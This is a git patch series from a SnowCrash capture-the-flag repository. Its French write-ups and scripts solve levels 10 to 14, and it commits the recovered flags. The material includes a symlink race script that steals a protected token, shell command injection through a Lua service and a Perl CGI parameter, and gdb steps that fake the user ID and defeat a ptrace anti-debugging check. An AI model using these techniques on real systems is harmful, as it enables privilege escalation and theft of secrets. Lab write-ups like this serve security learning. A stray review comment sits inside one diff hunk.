From e5215ef92da25bd7f85bd756af512187cbecab34 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 01:25:08 +0100
Subject: [PATCH 01/12] build(nix): removing my branch flake (working on worktree)
---
 flake.nix | 66 -------------------------------------------------------
 1 file changed, 66 deletions(-)
 delete mode 100644 flake.nix
diff --git a/flake.nix b/flake.nix
deleted file mode 100644
index f3dc569..0000000
--- a/flake.nix
+++ /dev/null
@@ -1,66 +0,0 @@
-{
- description = "Shell for snowcrash project";
-
- inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-unstable";
- inputs.flake-utils.url = "github:numtide/flake-utils";
-
- outputs =
- {
- self,
- nixpkgs,
- flake-utils,
- }:
- flake-utils.lib.eachDefaultSystem (
- system:
- let
- pkgs = import nixpkgs {
- inherit system;
- };
- tmux-setup = pkgs.writeShellScriptBin "tmux-setup" ''
- #!/usr/bin/env sh
- SESSION="SnowCrash"
- DIR=$(git rev-parse --show-toplevel 2>/dev/null || pwd)
- if ! tmux has-session -t $SESSION 2>/dev/null; then
- tmux new-session -d -s $SESSION -c "$DIR" -n dev
- tmux send-keys -t $SESSION:0 'ssh level00@localhost -p 4242' C-m
- tmux split-window -h -p 30 -t $SESSION:0 -c "$DIR"
- tmux send-keys -t $SESSION:0.1 'exec zsh' C-m
- tmux new-window -t $SESSION:1 -n git -c "$DIR"
- tmux send-keys -t $SESSION:1 'lazygit' C-m
- fi
- tmux select-window -t $SESSION:0
- tmux select-pane -t $SESSION:0.0
- tmux attach -t $SESSION
- '';
- in
- {
- devShells.default = pkgs.mkShell {
- name = "snowcrash-42";
- buildInputs =
- with pkgs;
- [
- tmux-setup
- john
- wireshark-qt
- ]
- ++ (
- if pkgs.stdenv.isLinux then
- [
- strace
- ltrace
- mtrace
- ]
- else
- [ ]
- );
-
- shellHook = ''
- export AS=nasm
- export CC='clang'
- export ASM_LSP_CONFIG="$(pwd)/asm-lsp.toml"
- printf "\n\033[0;90mASM env loaded for: \033[38;5;220m${system}\033[0m\n"
- '';
- };
- }
- );
-}
From b28e4293f390ca76bc9df0bda6369b5f31e3cf0f Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 01:25:15 +0100
Subject: [PATCH 02/12] feat(lvl10/ressources): adding the toctou script
---
 level10/ressources/toctou.sh | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 level10/ressources/toctou.sh
diff --git a/level10/ressources/toctou.sh b/level10/ressources/toctou.sh
new file mode 100644
index 0000000..2127ab8
--- /dev/null
+++ b/level10/ressources/toctou.sh
@@ -0,0 +1,17 @@
+#!/bin/env bash
+
+INPUT="/home/user/level10/token"
+OUTPUT="/tmp/toctou"
+PROGRAM="/home/user/level10/level10"
+
+touch $OUTPUT
+
+while true; do $PROGRAM $OUTPUT 127.0.0.1; done &
+
+while ! test -r $OUTPUT; do
+ rm -f $OUTPUT
+ touch $OUTPUT
+ rm -rf $OUTPUT
+ ln -s $INPUT $OUTPUT
+done
+
From 6e44233f55d9db9da91b7f78bccd88baf0fd1514 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 01:25:39 +0100
Subject: [PATCH 03/12] docs(lvl10): adding the readme
---
 level10/README.md | 70 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 level10/README.md
diff --git a/level10/README.md b/level10/README.md
new file mode 100644
index 0000000..8a7d2a5
--- /dev/null
+++ b/level10/README.md
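Review bot: The sender loop put in the background on `while true; do $PROGRAM $OUTPUT 127.0.0.1; done &` is never terminated: nothing in the script kills it, and the foreground `while ! test -r $OUTPUT` loop has no exit of its own, so after an interrupted run the background loop is most likely left behind; adding `trap 'kill $!' EXIT` right after the `&` line makes the script tear down what it started. The shebang `#!/bin/env bash` relies on `env` living in `/bin`, which is not the case on most distributions; `#!/usr/bin/env bash` is the portable form. `$INPUT`, `$OUTPUT` and `$PROGRAM` are expanded unquoted throughout, and `rm -rf $OUTPUT` is a recursive delete where `rm -f "$OUTPUT"` is all that is needed; quoting each expansion keeps the script correct if any of the paths is ever changed. A short header comment stating what the script exercises (the README's observation that the program's `access()` check is separate from its later `open()` of the same path) would let a reader follow the two loops without the writeup.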
@@ -0,0 +1,70 @@
+Lors de mon arriver sur le level10 je remarque 2 fichier dans mon home
+
+```bash
+ls -l
+total 16
+-rwsr-sr-x+ 1 flag10 level10 10817 Mar 5 2016 level10
+-rw------- 1 flag10 flag10 26 Mar 5 2016 token
+```
+
+level10 est un executable qui prends 2 arguments
+```bash
+./level10
+./level10 file host
+ sends file to host if you have access to it
+```
+
+Bien sur token n'est pas lisible par le programme
+```c
+ltrace ./level10 ./token
+__libc_start_main(0x80486d4, 2, 0xbffff7e4, 0x8048970, 0x80489e0
+printf("%s file host\n\tsends file to ho"..., "./level10"./level10 file host
+ sends file to host if you have access to it
+) = 65
+exit(1
++++ exited (status 1) +++
+```
+
+Je tente de faire un autre fichier /tmp/test et de lancer le programme avec
+```bash
+echo 'test' > /tmp/test
+
+level10@SnowCrash:~$ ltrace ./level10 /tmp/test 127.0.0.1
+__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0
+access("/tmp/test", 4) = 0
+printf("Connecting to %s:6969 .. ", "127.0.0.1") = 32
+fflush(0xb7fd1a20Connecting to 127.0.0.1:6969 .. ) = 0
+socket(2, 1, 0) = 3
+inet_addr("127.0.0.1") = 0x0100007f
+htons(6969, 1, 0, 0, 0) = 14619
+connect(3, 0xbffff71c, 16, 0, 0) = 0
+write(3, ".*( )*.\n", 8) = 8
+printf("Connected!\nSending file .. "Connected!
+) = 27
+fflush(0xb7fd1a20Sending file .. ) = 0
+open("/tmp/test", 0, 010) = 4
+read(4, "test\n", 4096) = 5
+write(3, "test\n", 5) = 5
+puts("wrote file!"wrote file!
+) = 12
++++ exited (status 12) +++
+```
+
+Il essaye donc l'envoyer un fichier sur le 6969, effectivement lors de la l'ecoute du port avec netcat
+```bash
+nc -lv 6969
+Connection from 127.0.0.1 port 6969 [tcp/*] accepted
+.*( )*.
+test
+```
+
+Le programme semble s'arreter a access lorsque il n'est pas possible de lire le fichier
+Mais access est vulnerable a TOUCTOU (Time-Of-Check to Time-Of-Use)
+Je vais donc faire un script en bash pour effectuer l'exploit
+
+```bash
+Connection from 127.0.0.1 port 6969 [tcp/*] accepted
+.*( )*.
+woupa2yuojeeaaed06riuj63c
+```
+au bout de 30s le flag tombe
From 7fd59db89b9aa21bbad3bac64146904181116927 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 01:26:59 +0100
Subject: [PATCH 04/12] feat(lvl10): adding the flag
---
 level10/flag | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 level10/flag
diff --git a/level10/flag b/level10/flag
new file mode 100644
index 0000000..c82e302
--- /dev/null
+++ b/level10/flag
@@ -0,0 +1 @@
+feulo4b72j7edeahuete3no7c
From 3e60a1558ddd5d3d6ec42ca6d512c59ca8628271 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:10 +0100
Subject: [PATCH 05/12] docs(lvl11): adding the readme
---
 level11/README.md | 68 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 level11/README.md
diff --git a/level11/README.md b/level11/README.md
new file mode 100644
index 0000000..454f930
--- /dev/null
+++ b/level11/README.md
@@ -0,0 +1,68 @@
+Lors de mon arriver sur le level 11 je remarque un fichier lua lisble
+
+```bash
+ls -l
+total 4
+-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua
+```
+
+Je l'ouvre pour regarder le contenue
+```lua
+#!/usr/bin/env lua
+local socket = require("socket")
+local server = assert(socket.bind("127.0.0.1", 5151))
+
+function hash(pass)
+ prog = io.popen("echo "..pass.." | sha1sum", "r")
+ data = prog:read("*all")
+ prog:close()
+
+ data = string.sub(data, 1, 40)
+
+ return data
+end
+
+
+while 1 do
+ local client = server:accept()
+ client:send("Password: ")
+ client:settimeout(60)
+ local l, err = client:receive()
+ if not err then
+ print("trying " .. l)
+ local h = hash(l)
+
+ if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
+ client:send("Erf nope..\n");
+ else
+ client:send("Gz you dumb*\n")
+ end
+
+ end
+
+ client:close()
+end
+```
+
+Le hash a ete decode via [CrashStation](https://crackstation.net/) et donne en sha1 NotSoEasy
+Ce n'est donc pas la reponse mais il fallait bien tenter
+
+Lors de la lecture du script nous pouvons voir que le port 5151 est ouvert et donc nous pouvons essayer de le lancer avec un netcat en ecoute de ce dernier
+
+Lorsqu'il est en ecoute il demande un password
+```bash
+nc localhost 5151
+Password:
+```
+
+mais le hash est calculer en effectuant une commande `echo $args | sha1sum` (traduit en shell)
+nous pouvons donc executer une commande sur cette derniere mais le resultat ne nous sera pas afficher car pas envoyer au client mais nous pouvons la lancer directement pour rediriger dans un fichier
+```bash
+nc localhost 5151
+Password: $(getflag > /tmp/level11)
+Erf nope...
+
+cat /tmp/level11
+Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
+```
+
From 1bf9c83d06b8c7a469043e43436b913868861936 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:14 +0100
Subject: [PATCH 06/12] docs(lvl12): adding the readme
---
 level12/README.md | 51 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 level12/README.md
diff --git a/level12/README.md b/level12/README.md
new file mode 100644
index 0000000..971bb25
--- /dev/null
+++ b/level12/README.md
@@ -0,0 +1,51 @@
+Lors de mon arriver sur le level12 je remarque un fichier lisible avec un script perl
+
+```bash
+ls -l
+total 4
+-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl
+```
+
+Ce sciprt prends 2 entree utilisateur (x, y) et transforme x a l'aide de la commande egrep
+```perl
+#!/usr/bin/env perl
+# localhost:4646
+use CGI qw{param};
+print "Content-type: text/html\n\n";
+
+sub t {
+ $nn = $_[1];
+ $xx = $_[0];
+ $xx =~ tr/a-z/A-Z/;
+ $xx =~ s/\s.*//;
+ @output = `egrep "^$xx" /tmp/xd 2>&1`;
+ foreach $line (@output) {
+ ($f, $s) = split(/:/, $line);
+ if($s =~ $nn) {
+ return 1;
+ }
+ }
+ return 0;
+}
+
+sub n {
+ if($_[0] == 1) {
+ print("..");
+ } else {
+ print(".");
+ }
+}
+
+n(t(param("x"), param("y")));
+
+```
+
+L'exploit est donc assez simple il suffit de mettre la commande souhaiter dans un fichier avec un nom en majuscule (a cause du tr) et elle sera executer
+
+```bash
+echo "getflag > /tmp/pass" > /tmp/LEVEL
+mv /tmp/level /tmp/LEVEL
+curl 'localhost:4646?x=`/*/LEVEL`'
+cat /tmp/pass
+Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
+```
From fefcf8fcd1c93f4dc2da62bf8e0f0e1e4f9333c1 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:20 +0100
Subject: [PATCH 07/12] docs(lvl13): adding the readme
---
 level13/README.md | 88 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 level13/README.md
diff --git a/level13/README.md b/level13/README.md
new file mode 100644
index 0000000..3081b8e
--- /dev/null
+++ b/level13/README.md
@@ -0,0 +1,88 @@
+Lors de l'arriver sur le level13 je remarque le fichier level13
+
+```bash
+ls -l level13
+-rwsr-sr-x 1 flag13 level13 7303 Aug 30 2015 level13
+```
+
+Et je remarque egallement que c'est du C
+```c
+ltrace ./level13
+__libc_start_main(0x804858c, 1, 0xbffff7f4, 0x80485f0, 0x8048660
+getuid() = 2013
+getuid() = 2013
+printf("UID %d started us but we we expe"..., 2013UID 2013 started us but we we expect 4242
+) = 42
+exit(1
++++ exited (status 1) +++
+
+```
+
+en le lancant (plus proprement), il attente l'UID 4242
+```bash
+level13@SnowCrash:~$ ./level13
+UID 2013 started us but we we expect 4242
+```
+
+Voici le code de la fonction main
+```asm
+0804858c
:
+ 804858c: 55 push ebp
+ 804858d: 89 e5 mov ebp,esp
+ 804858f: 83 e4 f0 and esp,0xfffffff0
+ 8048592: 83 ec 10 sub esp,0x10
+ 8048595: e8 e6 fd ff ff call 8048380
+ 804859a: 3d 92 10 00 00 cmp eax,0x1092
+ 804859f: 74 2a je 80485cb
+ 80485a1: e8 da fd ff ff call 8048380
+ 80485a6: ba c8 86 04 08 mov edx,0x80486c8
+ 80485ab: c7 44 24 08 92 10 00 mov DWORD PTR [esp+0x8],0x1092
+ 80485b2: 00
+ 80485b3: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
+ 80485b7: 89 14 24 mov DWORD PTR [esp],edx
+ 80485ba: e8 a1 fd ff ff call 8048360
+ 80485bf: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1
+ 80485c6: e8 d5 fd ff ff call 80483a0
+ 80485cb: c7 04 24 ef 86 04 08 mov DWORD PTR [esp],0x80486ef
+ 80485d2: e8 9d fe ff ff call 8048474
+ 80485d7: ba 09 87 04 08 mov edx,0x8048709
+ 80485dc: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
+ 80485e0: 89 14 24 mov DWORD PTR [esp],edx
+ 80485e3: e8 78 fd ff ff call 8048360
+ 80485e8: c9 leave
+ 80485e9: c3 ret
+ 80485ea: 90 nop
+ 80485eb: 90 nop
+ 80485ec: 90 nop
+ 80485ed: 90 nop
+ 80485ee: 90 nop
+ 80485ef: 90 nop
+```
+
+Notamment cette ligne (7) qui vas nous interesser
+```asm
+804859a: cmp eax,0x1092
+```
+
+0x1092 = 0d4242
+il suffit de changer la valeur de notre uid lors de la comparaison (a l'aide de gdb)
+```asm
+(gdb) b main
+Breakpoint 1 at 0x804858f
+(gdb) b *0x804859a
+Breakpoint 2 at 0x804859a
+(gdb) r
+Starting program: /home/user/level13/level13
+
+Breakpoint 1, 0x0804858f in main ()
+(gdb) s
+Single stepping until exit from function main,
+which has no line number information.
+
+Breakpoint 2, 0x0804859a in main ()
+(gdb) set $eax=0x1092
+(gdb) c
+Continuing.
+your token is 2A31L79asukciNyi8uppkEuSx
+[Inferior 1 (process 2288) exited with code 050]
+```
From 5149600cb04c156fc9df2877af38dc75ecef444f Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:33 +0100
Subject: [PATCH 08/12] feat(lvl11): adding the flag
---
 level11/flag | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 level11/flag
diff --git a/level11/flag b/level11/flag
new file mode 100644
index 0000000..54ea557
--- /dev/null
+++ b/level11/flag
@@ -0,0 +1 @@
+fa6v5ateaw21peobuub8ipe6s
From 68b88e24e8a118518b92a4458bfa51ab00b20eb4 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:37 +0100
Subject: [PATCH 09/12] feat(lvl12): adding the flag
---
 level12/flag | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 level12/flag
diff --git a/level12/flag b/level12/flag
new file mode 100644
index 0000000..29e9492
--- /dev/null
+++ b/level12/flag
@@ -0,0 +1 @@
+g1qKMiRpXf53AWhDaU7FEkczr
From cab46cc0938b8f292c3c21dfe8ec6f8e2e2b9042 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 02:49:41 +0100
Subject: [PATCH 10/12] feat(lvl13): adding the flag
---
 level13/flag | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 level13/flag
diff --git a/level13/flag b/level13/flag
new file mode 100644
index 0000000..58c7d7f
--- /dev/null
+++ b/level13/flag
@@ -0,0 +1 @@
+2A31L79asukciNyi8uppkEuSx
From f45c37f00efa4c4dda4fd82a7d42ba99ae0b80ec Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 03:33:22 +0100
Subject: [PATCH 11/12] docs(level14): adding the readme
---
 level14/README.md | 79 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 79 insertions(+)
 create mode 100644 level14/README.md
diff --git a/level14/README.md b/level14/README.md
new file mode 100644
index 0000000..9c98293
--- /dev/null
+++ b/level14/README.md
@@ -0,0 +1,79 @@
+Le repertoire de level14 est vide et aucun flag restant apparent... il ne reste plus qu'a regarder directement dans getflag :eyes:
+
+(Pour etre honnete je souhaiter faire ca pour tous les flags mais j'ai ete spoiler que c'etait le dernier niveau)
+
+En regardant le code ca ressemble a une foret de if else if
+
+En passant par le main j'obtiens ce message
+```asm
+(gdb) b main
+Breakpoint 1 at 0x804894a
+(gdb) r
+Starting program: /bin/getflag
+
+Breakpoint 1, 0x0804894a in main ()
+(gdb) c
+Continuing.
+You should not reverse this
+[Inferior 1 (process 2506) exited with code 01]
+```
+
+c'est ptrace qui nous empeche de faire ce que nous souhaitons
+```asm
+ 8048989: e8 b2 fb ff ff call 8048540
+ 804898e: 85 c0 test eax,eax
+```
+
+J'ai donc pu le bypass il suffit d'aller a ptrace puis de mettre eax a 0 (afin qu'il pense que c'est une execution classique)
+```asm
+gdb /bin/getflag
+(gdb) b ptrace
+Breakpoint 1 at 0x8048540
+(gdb) r
+Starting program: /bin/getflag
+
+Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6
+(gdb) n
+Single stepping until exit from function ptrace,
+which has no line number information.
+0x0804898e in main ()
+(gdb) set $eax=0
+(gdb) n
+Single stepping until exit from function main,
+which has no line number information.
+Check flag.Here is your token :
+Nope there is no token here for you sorry. Try again :)
+```
+
+Voici l'exploit complet avec le changement de la return value de getuid pour 3014 (soit d'apres /etc/passwd l'uid de flag14)
+```asm
+gdb /bin/getflag
+(gdb) b ptrace
+Breakpoint 1 at 0x8048540
+(gdb) b getuid
+Breakpoint 2 at 0x80484b0
+(gdb) r
+Starting program: /bin/getflag
+
+Breakpoint 1, 0xb7f146d0 in ptrace () from /lib/i386-linux-gnu/libc.so.6
+(gdb) n
+Single stepping until exit from function ptrace,
+which has no line number information.
+0x0804898e in main ()
+(gdb) set $eax=0
+(gdb) n
+Single stepping until exit from function main,
+which has no line number information.
+
+Breakpoint 2, 0xb7ee4cc0 in getuid () from /lib/i386-linux-gnu/libc.so.6
+(gdb) n
+Single stepping until exit from function getuid,
+which has no line number information.
+0x08048b02 in main ()
+(gdb) set $eax=0xBC6
+(gdb) n
+Single stepping until exit from function main,
+which has no line number information.
+Check flag.Here is your token : 7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ
+
+```
From 2cfe814f51aada0d2d0fc0fb4a4d6198cd6ce965 Mon Sep 17 00:00:00 2001
From: Raphael
Date: Wed, 28 Jan 2026 03:33:34 +0100
Subject: [PATCH 12/12] feat(lvl14): adding the flag
---
 level14/flag | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 level14/flag
diff --git a/level14/flag b/level14/flag
new file mode 100644
index 0000000..e8aa4cf
--- /dev/null
+++ b/level14/flag
@@ -0,0 +1 @@
+7QiHafiNa3HVozsaXkawuYrTstxbpABHD8CPnHJ